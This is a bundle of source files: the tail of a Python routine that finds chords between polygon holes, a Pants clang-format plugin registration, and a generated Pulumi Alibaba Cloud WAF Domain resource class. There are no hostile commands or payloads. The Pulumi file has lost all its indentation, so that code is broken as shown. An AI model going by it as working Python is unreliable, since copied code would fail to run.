                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        # check if the other hole is at the left of the referring hole
                        if other_holes[1][1] < hole_v[1]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[1][0] == hole_v[0]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[1][1] > max_col_ind:
                                    max_col_ind = other_holes[1][1]
                                    matching_coord_hori = other_holes[1]
                            elif other_holes[2][0] == hole_v[0]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[2][1] > max_col_ind:
                                    max_col_ind = other_holes[2][1]
                                    matching_coord_hori = other_holes[2]
                # check for any matching vertical coordinates on the boundary
                for concave_ind in concave_inds:
                    if concave_ind[1] == hole_v[1]:
                        if concave_ind[0] > hole_v[0]:
                            if concave_ind[0] < min_row_ind:
                                min_row_ind = concave_ind[0]
                                matching_coord_verti = concave_ind
                # check for any matching vertical coordinate with another hole below the given hole
                for other_holes in holes:
                    if other_holes == hole:
                        continue
                    else:
                        if other_holes[0][0] > hole_v[0]:
                            # are there any holes at the same level as the considered hole?
                            if other_holes[0][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[0][0] < min_row_ind:
                                    min_row_ind = other_holes[0][0]
                                    matching_coord_verti = other_holes[0]
                            elif other_holes[1][1] == hole_v[1]:
                                # choose the closest other-hole point near the extracted hole
                                if other_holes[1][0] < min_row_ind:
                                    min_row_ind = other_holes[1][0]
                                    matching_coord_verti = other_holes[1]
            # ====== left lower coordinate of the hole ends ======

            if len(matching_coord_verti) > 0:
                if not (([hole_v, list(matching_coord_verti)] in vertical_chords) or (
                        [list(matching_coord_verti), hole_v] in vertical_chords)):
                    vertical_chords.append([hole_v, list(matching_coord_verti)])
            if len(matching_coord_hori) > 0:
                if not (([hole_v, list(matching_coord_hori)] in horizontal_chords) or (
                        [list(matching_coord_hori), hole_v] in horizontal_chords)):
                    horizontal_chords.append([hole_v, list(matching_coord_hori)])

    return horizontal_chords, vertical_chords
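Each of the four corner branches above repeats one primitive: scan candidate vertices on the same row (or column) as a hole corner and keep the closest one in the search direction. A self-contained sketch of that primitive for the left-of-corner case (`nearest_left_match` is an illustrative name, not from the original):

```python
def nearest_left_match(corner, candidates):
    """Among candidate [row, col] vertices on the same row as ``corner``,
    return the closest one strictly to its left (largest column index),
    or None if there is no such vertex."""
    row, col = corner
    best = None
    for cand_row, cand_col in candidates:
        if cand_row == row and cand_col < col:
            if best is None or cand_col > best[1]:
                best = [cand_row, cand_col]
    return best
```

The other seven searches differ only in the axis compared and the direction of the inequality.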

# ---------------------------------------------------------------------------
# File: pants-plugins/experimental/cpp/lint/clangformat/register.py
# Repo: sureshjoshi/pants-plugins (Apache-2.0 license)
# ---------------------------------------------------------------------------

from experimental.cpp.lint.clangformat.rules import rules as clangformat_rules


def rules():
    return (*clangformat_rules(),)

# ---------------------------------------------------------------------------
# File: sdk/python/pulumi_alicloud/waf/domain.py
# Repo: pulumi/pulumi-alicloud (ECL-2.0 / Apache-2.0 licenses)
# ---------------------------------------------------------------------------

# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DomainArgs', 'Domain']
@pulumi.input_type
class DomainArgs:
def __init__(__self__, *,
instance_id: pulumi.Input[str],
is_access_product: pulumi.Input[str],
cluster_type: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a Domain resource.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Default to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests as HTTPS requests. Valid values: "On" and `Off`. Default to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Default to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]] log_headers: The key-value pair that is used to mark the traffic that flows through WAF to the domain. Each item contains two field:
* key: The key of label
* value: The value of label
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of the IP address or domain of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The timeout period for a WAF exclusive cluster write connection. Unit: seconds.
"""
pulumi.set(__self__, "instance_id", instance_id)
pulumi.set(__self__, "is_access_product", is_access_product)
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if connection_time is not None:
pulumi.set(__self__, "connection_time", connection_time)
if domain is not None:
warnings.warn("""Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""", DeprecationWarning)
pulumi.log.warn("""domain is deprecated: Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""")
if domain is not None:
pulumi.set(__self__, "domain", domain)
if domain_name is not None:
pulumi.set(__self__, "domain_name", domain_name)
if http2_ports is not None:
pulumi.set(__self__, "http2_ports", http2_ports)
if http_ports is not None:
pulumi.set(__self__, "http_ports", http_ports)
if http_to_user_ip is not None:
pulumi.set(__self__, "http_to_user_ip", http_to_user_ip)
if https_ports is not None:
pulumi.set(__self__, "https_ports", https_ports)
if https_redirect is not None:
pulumi.set(__self__, "https_redirect", https_redirect)
if load_balancing is not None:
pulumi.set(__self__, "load_balancing", load_balancing)
if log_headers is not None:
pulumi.set(__self__, "log_headers", log_headers)
if read_time is not None:
pulumi.set(__self__, "read_time", read_time)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if source_ips is not None:
pulumi.set(__self__, "source_ips", source_ips)
if write_time is not None:
pulumi.set(__self__, "write_time", write_time)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Input[str]:
"""
The ID of the WAF instance.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: pulumi.Input[str]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="isAccessProduct")
def is_access_product(self) -> pulumi.Input[str]:
"""
Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Default to `Off`.
"""
return pulumi.get(self, "is_access_product")
@is_access_product.setter
def is_access_product(self, value: pulumi.Input[str]):
pulumi.set(self, "is_access_product", value)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Default to `PhysicalCluster`.
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter(name="connectionTime")
def connection_time(self) -> Optional[pulumi.Input[int]]:
"""
The connection timeout for WAF exclusive clusters. Unit: seconds.
"""
return pulumi.get(self, "connection_time")
@connection_time.setter
def connection_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_time", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[pulumi.Input[str]]:
"""
The domain that you want to add to WAF.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="http2Ports")
def http2_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP 2.0 ports.
"""
return pulumi.get(self, "http2_ports")
@http2_ports.setter
def http2_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http2_ports", value)
@property
@pulumi.getter(name="httpPorts")
def http_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP ports.
"""
return pulumi.get(self, "http_ports")
@http_ports.setter
def http_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http_ports", value)
@property
@pulumi.getter(name="httpToUserIp")
def http_to_user_ip(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "http_to_user_ip")
@http_to_user_ip.setter
def http_to_user_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_to_user_ip", value)
@property
@pulumi.getter(name="httpsPorts")
def https_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTPS ports.
"""
return pulumi.get(self, "https_ports")
@https_ports.setter
def https_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "https_ports", value)
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to redirect HTTP requests to HTTPS. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "https_redirect")
@https_redirect.setter
def https_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "https_redirect", value)
@property
@pulumi.getter(name="loadBalancing")
def load_balancing(self) -> Optional[pulumi.Input[str]]:
"""
The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Defaults to `IpHash`.
"""
return pulumi.get(self, "load_balancing")
@load_balancing.setter
def load_balancing(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing", value)
@property
@pulumi.getter(name="logHeaders")
def log_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]:
"""
The key-value pairs that are used to mark the traffic that flows through WAF to the domain. Each item contains two fields:
* key: The key of the label.
* value: The value of the label.
"""
return pulumi.get(self, "log_headers")
@log_headers.setter
def log_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]):
pulumi.set(self, "log_headers", value)
@property
@pulumi.getter(name="readTime")
def read_time(self) -> Optional[pulumi.Input[int]]:
"""
The read timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "read_time")
@read_time.setter
def read_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_time", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="sourceIps")
def source_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of IP addresses or domains of the origin server to which the specified domain points.
"""
return pulumi.get(self, "source_ips")
@source_ips.setter
def source_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_ips", value)
@property
@pulumi.getter(name="writeTime")
def write_time(self) -> Optional[pulumi.Input[int]]:
"""
The write timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "write_time")
@write_time.setter
def write_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_time", value)
@pulumi.input_type
class _DomainState:
def __init__(__self__, *,
cluster_type: Optional[pulumi.Input[str]] = None,
cname: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Domain resources.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Defaults to `PhysicalCluster`.
:param pulumi.Input[str] cname: The CNAME record assigned by the WAF instance to the specified domain.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests to HTTPS. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Defaults to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]] log_headers: The key-value pairs that are used to mark the traffic that flows through WAF to the domain. Each item contains two fields:
* key: The key of the label.
* value: The value of the label.
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of IP addresses or domains of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The write timeout of a WAF exclusive cluster. Unit: seconds.
"""
if cluster_type is not None:
pulumi.set(__self__, "cluster_type", cluster_type)
if cname is not None:
pulumi.set(__self__, "cname", cname)
if connection_time is not None:
pulumi.set(__self__, "connection_time", connection_time)
if domain is not None:
warnings.warn("""Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""", DeprecationWarning)
pulumi.log.warn("""domain is deprecated: Field 'domain' has been deprecated from version 1.94.0. Use 'domain_name' instead.""")
if domain is not None:
pulumi.set(__self__, "domain", domain)
if domain_name is not None:
pulumi.set(__self__, "domain_name", domain_name)
if http2_ports is not None:
pulumi.set(__self__, "http2_ports", http2_ports)
if http_ports is not None:
pulumi.set(__self__, "http_ports", http_ports)
if http_to_user_ip is not None:
pulumi.set(__self__, "http_to_user_ip", http_to_user_ip)
if https_ports is not None:
pulumi.set(__self__, "https_ports", https_ports)
if https_redirect is not None:
pulumi.set(__self__, "https_redirect", https_redirect)
if instance_id is not None:
pulumi.set(__self__, "instance_id", instance_id)
if is_access_product is not None:
pulumi.set(__self__, "is_access_product", is_access_product)
if load_balancing is not None:
pulumi.set(__self__, "load_balancing", load_balancing)
if log_headers is not None:
pulumi.set(__self__, "log_headers", log_headers)
if read_time is not None:
pulumi.set(__self__, "read_time", read_time)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
if source_ips is not None:
pulumi.set(__self__, "source_ips", source_ips)
if write_time is not None:
pulumi.set(__self__, "write_time", write_time)
@property
@pulumi.getter(name="clusterType")
def cluster_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Defaults to `PhysicalCluster`.
"""
return pulumi.get(self, "cluster_type")
@cluster_type.setter
def cluster_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_type", value)
@property
@pulumi.getter
def cname(self) -> Optional[pulumi.Input[str]]:
"""
The CNAME record assigned by the WAF instance to the specified domain.
"""
return pulumi.get(self, "cname")
@cname.setter
def cname(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cname", value)
@property
@pulumi.getter(name="connectionTime")
def connection_time(self) -> Optional[pulumi.Input[int]]:
"""
The connection timeout for WAF exclusive clusters. Unit: seconds.
"""
return pulumi.get(self, "connection_time")
@connection_time.setter
def connection_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "connection_time", value)
@property
@pulumi.getter
def domain(self) -> Optional[pulumi.Input[str]]:
"""
Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
"""
return pulumi.get(self, "domain")
@domain.setter
def domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> Optional[pulumi.Input[str]]:
"""
The domain that you want to add to WAF.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="http2Ports")
def http2_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP 2.0 ports.
"""
return pulumi.get(self, "http2_ports")
@http2_ports.setter
def http2_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http2_ports", value)
@property
@pulumi.getter(name="httpPorts")
def http_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTP ports.
"""
return pulumi.get(self, "http_ports")
@http_ports.setter
def http_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "http_ports", value)
@property
@pulumi.getter(name="httpToUserIp")
def http_to_user_ip(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "http_to_user_ip")
@http_to_user_ip.setter
def http_to_user_ip(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_to_user_ip", value)
@property
@pulumi.getter(name="httpsPorts")
def https_ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of the HTTPS ports.
"""
return pulumi.get(self, "https_ports")
@https_ports.setter
def https_ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "https_ports", value)
@property
@pulumi.getter(name="httpsRedirect")
def https_redirect(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to redirect HTTP requests to HTTPS. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "https_redirect")
@https_redirect.setter
def https_redirect(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "https_redirect", value)
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the WAF instance.
"""
return pulumi.get(self, "instance_id")
@instance_id.setter
def instance_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "instance_id", value)
@property
@pulumi.getter(name="isAccessProduct")
def is_access_product(self) -> Optional[pulumi.Input[str]]:
"""
Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Defaults to `Off`.
"""
return pulumi.get(self, "is_access_product")
@is_access_product.setter
def is_access_product(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "is_access_product", value)
@property
@pulumi.getter(name="loadBalancing")
def load_balancing(self) -> Optional[pulumi.Input[str]]:
"""
The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Defaults to `IpHash`.
"""
return pulumi.get(self, "load_balancing")
@load_balancing.setter
def load_balancing(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing", value)
@property
@pulumi.getter(name="logHeaders")
def log_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]:
"""
The key-value pairs that are used to mark the traffic that flows through WAF to the domain. Each item contains two fields:
* key: The key of the label.
* value: The value of the label.
"""
return pulumi.get(self, "log_headers")
@log_headers.setter
def log_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainLogHeaderArgs']]]]):
pulumi.set(self, "log_headers", value)
@property
@pulumi.getter(name="readTime")
def read_time(self) -> Optional[pulumi.Input[int]]:
"""
The read timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "read_time")
@read_time.setter
def read_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "read_time", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter(name="sourceIps")
def source_ips(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of IP addresses or domains of the origin server to which the specified domain points.
"""
return pulumi.get(self, "source_ips")
@source_ips.setter
def source_ips(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "source_ips", value)
@property
@pulumi.getter(name="writeTime")
def write_time(self) -> Optional[pulumi.Input[int]]:
"""
The write timeout of a WAF exclusive cluster. Unit: seconds.
"""
return pulumi.get(self, "write_time")
@write_time.setter
def write_time(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "write_time", value)
class Domain(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_type: Optional[pulumi.Input[str]] = None,
connection_time: Optional[pulumi.Input[int]] = None,
domain: Optional[pulumi.Input[str]] = None,
domain_name: Optional[pulumi.Input[str]] = None,
http2_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
http_to_user_ip: Optional[pulumi.Input[str]] = None,
https_ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
https_redirect: Optional[pulumi.Input[str]] = None,
instance_id: Optional[pulumi.Input[str]] = None,
is_access_product: Optional[pulumi.Input[str]] = None,
load_balancing: Optional[pulumi.Input[str]] = None,
log_headers: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]]] = None,
read_time: Optional[pulumi.Input[int]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
source_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
write_time: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Provides a WAF Domain resource to create a domain in Web Application Firewall (WAF).
For information about WAF and how to use it, see [What is Alibaba Cloud WAF](https://www.alibabacloud.com/help/doc-detail/28517.htm).
> **NOTE:** Available in 1.82.0+.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
domain = alicloud.waf.Domain("domain",
cluster_type="PhysicalCluster",
domain_name="www.aliyun.com",
http2_ports=["443"],
http_ports=["80"],
http_to_user_ip="Off",
https_ports=["443"],
https_redirect="Off",
instance_id="waf-123455",
is_access_product="On",
load_balancing="IpHash",
log_headers=[alicloud.waf.DomainLogHeaderArgs(
key="foo",
value="http",
)],
source_ips=["1.1.1.1"])
```
## Import
WAF domain can be imported using the id, e.g.
```sh
$ pulumi import alicloud:waf/domain:Domain domain waf-132435:www.domain.com
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_type: The type of the WAF cluster. Valid values: `PhysicalCluster` and `VirtualCluster`. Defaults to `PhysicalCluster`.
:param pulumi.Input[int] connection_time: The connection timeout for WAF exclusive clusters. Unit: seconds.
:param pulumi.Input[str] domain: Field `domain` has been deprecated from version 1.94.0. Use `domain_name` instead.
:param pulumi.Input[str] domain_name: The domain that you want to add to WAF.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http2_ports: List of the HTTP 2.0 ports.
:param pulumi.Input[Sequence[pulumi.Input[str]]] http_ports: List of the HTTP ports.
:param pulumi.Input[str] http_to_user_ip: Specifies whether to enable the HTTP back-to-origin feature. After this feature is enabled, the WAF instance can use HTTP to forward HTTPS requests to the origin server.
By default, port 80 is used to forward the requests to the origin server. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] https_ports: List of the HTTPS ports.
:param pulumi.Input[str] https_redirect: Specifies whether to redirect HTTP requests to HTTPS. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[str] instance_id: The ID of the WAF instance.
:param pulumi.Input[str] is_access_product: Specifies whether to configure a Layer-7 proxy, such as Anti-DDoS Pro or CDN, to filter the inbound traffic before it is forwarded to WAF. Valid values: `On` and `Off`. Defaults to `Off`.
:param pulumi.Input[str] load_balancing: The load balancing algorithm that is used to forward requests to the origin. Valid values: `IpHash` and `RoundRobin`. Defaults to `IpHash`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['DomainLogHeaderArgs']]]] log_headers: The key-value pairs that are used to mark the traffic that flows through WAF to the domain. Each item contains two fields:
* key: The key of the label.
* value: The value of the label.
:param pulumi.Input[int] read_time: The read timeout of a WAF exclusive cluster. Unit: seconds.
:param pulumi.Input[str] resource_group_id: The ID of the resource group to which the queried domain belongs in Resource Management. By default, no value is specified, indicating that the domain belongs to the default resource group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] source_ips: List of IP addresses or domains of the origin server to which the specified domain points.
:param pulumi.Input[int] write_time: The write timeout of a WAF exclusive cluster. Unit: seconds.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DomainArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a WAF Domain resource to create a domain in Web Application Firewall (WAF).
For information about WAF and how to use it, see [What is Alibaba Cloud WAF](https://www.alibabacloud.com/help/doc-detail/28517.htm).
> **NOTE:** Available in 1.82.0+.
## Example Usage
```python
import pulumi
import pulumi_alicloud as alicloud
domain = alicloud.waf.Domain("domain",
cluster_type="PhysicalCluster",
domain_name="www.aliyun.com",
http2_ports=["443"],
http_ports=["80"],
http_to_user_ip="Off",
https_ports=["443"],
https_redirect="Off",
instance_id="waf-123455",
is_access_product="On",
load_balancing="IpHash",
log_headers=[alicloud.waf.DomainLogHeaderArgs(
key="foo",
value="http",
)],
source_ips=["1.1.1.1"])
```
## Import
WAF domain can be imported using the id, e.g.
```sh
$ pulumi import alicloud:waf/domain:Domain domain waf-132435:www.domain.com
```
